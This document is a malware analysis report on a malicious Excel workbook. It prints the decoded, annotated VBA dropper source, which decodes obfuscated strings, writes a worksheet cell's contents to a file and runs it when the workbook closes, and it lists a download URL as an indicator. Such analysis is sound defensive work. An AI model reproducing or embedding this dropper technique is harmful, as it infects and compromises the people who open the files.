Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 532aeaaf452fbafe…

MALICIOUS

Office (OLE)

31.5 KB · Created: 1996-10-08 23:32:33 (taken from OLE metadata, which the author controls — not a reliable dating indicator) · Authoring application: Microsoft Excel · First seen: 2015-04-15
MD5: 68264dfa2f0b2126a9a8cdb6df52649f SHA-1: 1024017758284f1284894ac0b7255f5734636eb8 SHA-256: 532aeaaf452fbafee06bf45f0be61020d279e71a59cffc4b56486b9ddb71e8d3
Risk Score: 100

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1105 Ingress Tool Transfer

The VBA macro contains obfuscated calls to CreateObject for Microsoft.XMLHTTP and ADODB.Stream, indicating it is designed to download a file. The script reconstructs the URL "http://62.75.42.21/czxa/ddls.gif" and saves the downloaded content to a temporary executable file named "dfsdfdf.exe" in the user's temporary directory. It then attempts to execute this downloaded file. Note that the carved macros.bas shown below contains no XMLHTTP reference: the visible VBA decodes two ProgIDs with AOrMv(), writes the value of a single worksheet cell to a file through the stream object, and runs that file with the shell object's .Run. The download behaviour described here therefore appears to belong to a second stage stored in that cell rather than to the VBA itself; the decoded strings should be confirmed before the URL and filename are relied on as indicators.

Heuristics 3

  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WshShell = CreateObject(AOrMv(" {Џў— ") + AOrMv("¤8{–‘љљ"))

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3536 bytes
SHA-256: cfc233b040d06ece3acc6abf21444fe64e1db5ae30fe5a391188176eae113259
Preview script
First 1,000 lines of the extracted script
' --- Module: ThisWorkbook. VB_Name "ЭтаКнига" is Russian for "ThisWorkbook"; together
'     with the sheet modules "Лист1".."Лист3" ("Sheet1".."Sheet3") this suggests the
'     document was authored on a Russian-locale Excel install.
' VB_Base 00020819-0000-0000-C000-000000000046 is the Excel Workbook object class, so
' event procedures in this module (see Workbook_BeforeClose below) fire automatically.
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_BeforeClose(Cancel As Boolean)
' Entry point: Excel's BeforeClose event. The payload in Module1 runs only when the
' workbook is closed, not when it is opened, so a sandbox that opens the file and never
' closes it does not reach the malicious code. Cancel is not assigned, so the close
' proceeds normally once the payload has run.
xSJcum3HK8GM
End Sub

' --- Module: worksheet "Лист1" (Russian "Sheet1"). VB_Base 00020820-... is the Excel
'     Worksheet object class. No code beyond Option Explicit. Module1 reads its
'     second-stage text from one worksheet cell, addressed by a decoded tab name that is
'     not shown here, so one of the three sheets presumably holds that text — TODO confirm.
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


' --- Module: worksheet "Лист2" (Russian "Sheet2"); Excel Worksheet object class.
'     No code beyond Option Explicit.
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


' --- Module: worksheet "Лист3" (Russian "Sheet3"); Excel Worksheet object class.
'     No code beyond Option Explicit.
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


' --- Module1: the only module with logic. Holds the dropper routine xSJcum3HK8GM and
'     the two-function string decoder (AOrMv / HtQrUf). Unlike the sheet modules it has
'     no Option Explicit, which is why the undeclared variable "s" below compiles.
Attribute VB_Name = "Module1"

Sub xSJcum3HK8GM()
' Dropper routine, called from Workbook_BeforeClose. Every string literal is passed
' through AOrMv() (the octal decoder defined below), so no ProgID, sheet name, cell
' address or output path appears in clear text in the module.
' The unused Dim statements and blank lines scattered through this module carry no
' behaviour; they look like padding inserted to vary the module's appearance — TODO confirm.
Dim PathToSave

Dim UVe As Boolean



Dim smF As Boolean


' Output path, decoded at runtime. It is passed to ExpandEnvironmentStrings below, so the
' decoded string presumably contains a %VARIABLE% reference — confirm by decoding.
PathToSave = AOrMv("-|sx-†ќќpn““““Џ“�Џ8¦ЋЈ")
Dim WshShell

Dim TKBOYHHu As Integer



Dim kffejUNUZL As Double


' First COM object. The SC_STR_WSCRIPT heuristic and the .ExpandEnvironmentStrings/.Run
' calls below indicate Windows Script Host (WScript.Shell) — confirm by decoding the two fragments.
Set WshShell = CreateObject(AOrMv(" {Џў— ") + AOrMv("¤8{–‘љљ"))
' Resolves environment variables in the output path.
PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
' Second COM object. The Mode/Type/Open/WriteText/SaveToFile sequence is the ADODB.Stream
' interface (Mode 3 = adModeReadWrite, Type 2 = adTypeText). "s" is never declared: with
' no Option Explicit in Module1 it is an implicit Variant.
Set s = CreateObject(AOrMv("ehu") + AOrMv("hf8{¤ў‘Ќ›"))
s.Mode = 3
s.Type = 2
s.Open
' The payload is not downloaded here: the text written to the stream is the value of one
' worksheet cell (sheet name and cell address both decoded). Any network activity attributed
' to this sample presumably comes from the dropped script, i.e. from that cell's contents.
s.WriteText Worksheets(AOrMv("Ґ“}ѓj}ѓ“")).Range(AOrMv("h><")).Value
' SaveToFile option 2 = adSaveCreateOverWrite: the file is created or overwritten on disk.
Call s.SaveToFile(PathToSave, 2)
' Executes the freshly written file. Detection angle: Excel spawning a script host to run a
' file it has just written is the observable behaviour, independent of the string obfuscation.
WshShell.Run PathToSave

Dim QFCy As Currency



Dim Idfot As Double


End Sub
Public Function AOrMv(Eja5j As String) As String
' String decoder used for every literal in this module.
' For each character of Eja5j it takes the character's code (Asc), hands the decimal
' digits of that code to HtQrUf — which reinterprets them with base-8 place values —
' and appends Chr() of the result. Worked example: a character with code 123 gives the
' digit string "123", which HtQrUf reads as 1*64 + 2*8 + 3 = 83, i.e. "S".
' Most encoded characters are above 127, so Asc() depends on the system ANSI code page;
' the literals decode as intended only under the code page they were produced on (the
' Cyrillic module names suggest Windows-1251 — TODO confirm).
' Parameter Eja5j: encoded string. Returns: decoded string.

Dim GJdGKYiER As Byte



Dim poteXeJW As Date


    Dim I As Integer

Dim OIPsG As Byte



Dim CRmnvHCfuO As Single



Dim eIKqLQ As Double



Dim EdEPJbYyRp As Single


    ' gOcisfR220: input length; E1RkDubPSgOU: accumulates the decoded output.
    Dim gOcisfR220 As Integer, E1RkDubPSgOU As String

Dim ReEEfnAcyb As Boolean



Dim QuHHWadVtJ As Boolean


    gOcisfR220 = Len(Eja5j)
    For I = 1 To gOcisfR220

Dim bHDDB As Byte



Dim DOUQbsIPQ As Double


        ' Asc() yields an Integer; passing it to HtQrUf's String parameter converts it to
        ' its decimal-digit text, which is what the decoder expects.
        E1RkDubPSgOU = E1RkDubPSgOU & Chr(HtQrUf(Asc(Mid(Eja5j, I, 1))))
    Next I

Dim TyPuSkKk As String



Dim nNcVFmpKm As Long



Dim pRZmOhN As Single



Dim FUtWCAh As Double


    AOrMv = E1RkDubPSgOU

Dim oAGCNefBCM As Single



Dim snomrdWdHi As Date



Dim TjGIRojNPy As Boolean



Dim HOVlMLb As Date


End Function
Private Function HtQrUf(NidrM As String) As Integer
' Reads the digit string NidrM with base-8 place values: after StrReverse the first
' digit is the least significant and each position I is weighted 8^I. Called only by
' AOrMv with Asc() values converted to their decimal-digit text.
' Parameter NidrM: digit string. Returns: the resulting integer.

Dim XbBo As Single



Dim THcSJXhQ As Date


    Dim I As Integer
    ' gOcisfR220 is declared As String but receives Len(); VBA coerces it back to a number
    ' when it is used as the For bound. E1RkDubPSgOU accumulates the result, TUTEE holds
    ' the current digit.
    Dim gOcisfR220 As String, E1RkDubPSgOU As Integer, TUTEE As Integer

Dim mNYS As Single



Dim qsNpuJTnBo As Double


    gOcisfR220 = Len(NidrM)
    ' Loop bound is inclusive, so it runs one position past the last digit; Mid() then
    ' returns "" and Val("") is 0, so the extra iteration adds nothing.
    For I = 0 To gOcisfR220

Dim LMKP As Single



Dim DYMVs As Long


        TUTEE = Val(Mid(StrReverse(NidrM), I + 1, 1))
        E1RkDubPSgOU = E1RkDubPSgOU + ((8 ^ I) * TUTEE)
    Next I
    HtQrUf = E1RkDubPSgOU
End Function


' --- Module2: empty apart from Option Explicit; no code.
Attribute VB_Name = "Module2"
Option Explicit


' --- Module3: empty apart from Option Explicit; no code.
Attribute VB_Name = "Module3"
Option Explicit